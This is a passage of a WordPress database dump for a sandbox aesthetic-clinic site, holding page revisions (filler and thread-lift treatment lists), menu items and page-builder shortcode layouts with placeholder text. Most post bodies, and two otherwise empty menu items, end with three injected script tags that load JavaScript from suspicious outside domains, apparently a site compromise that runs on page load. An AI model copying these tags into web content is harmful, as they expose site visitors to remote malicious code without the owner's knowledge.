05:02:24','',6599,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6599-revision-v1/',0,'revision','',0),(6601,1,'2018-01-03 05:02:26','2018-01-03 05:02:26','<ol>\n 	<li>Eye ( Sunken eye / tear thought mild )</li>\n 	<li>Hydrate Skin</li>\n 	<li>Smiling Line / nose / chin / cheek / lips</li>\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Filler','','inherit','closed','closed','','6599-autosave-v1','','','2018-01-03 05:02:26','2018-01-03 05:02:26','',6599,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6599-autosave-v1/',0,'revision','',0),(6602,1,'2018-01-03 05:03:02','2018-01-03 05:03:02',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6602','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6602',92,'nav_menu_item','',0),(6603,1,'2018-01-03 05:03:47','2018-01-03 05:03:47','<strong>THREAD LIFTS</strong>\r\n\r\n<strong> </strong>\r\n<ol>\r\n 	<li>Half Face</li>\r\n 	<li>Full Face</li>\r\n 	<li>Full Face and Neck</li>\r\n 	<li>Tummy</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Thread Lifts','','publish','closed','closed','','aesthetic-solutions-11-4','','','2018-01-03 05:03:47','2018-01-03 05:03:47','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6603',0,'page','',0),(6604,1,'2018-01-03 05:03:47','2018-01-03 05:03:47','<strong>THREAD LIFTS</strong>\r\n\r\n<strong> </strong>\r\n<ol>\r\n 	<li>Half Face</li>\r\n 	<li>Full Face</li>\r\n 	<li>Full Face and Neck</li>\r\n 	<li>Tummy</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Thread Lifts','','inherit','closed','closed','','6603-revision-v1','','','2018-01-03 05:03:47','2018-01-03 05:03:47','',6603,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6603-revision-v1/',0,'revision','',0),(6605,1,'2018-01-03 05:04:19','2018-01-03 05:04:19',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6605','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6605',93,'nav_menu_item','',0),(6608,1,'2018-01-10 18:51:46','2018-01-10 18:51:46','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"default\" star_rating_color=\"accent-color\"][testimonial image=\"36\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-10 18:51:46','2018-01-10 18:51:46','',5,'http://sandbox.futuremediatrix.com/medikpro/2018/01/10/5-revision-v1/',0,'revision','',0),(6609,1,'2018-01-10 18:52:10','2018-01-10 18:52:10','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible_minimal\" star_rating_color=\"accent-color\"][testimonial image=\"36\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" 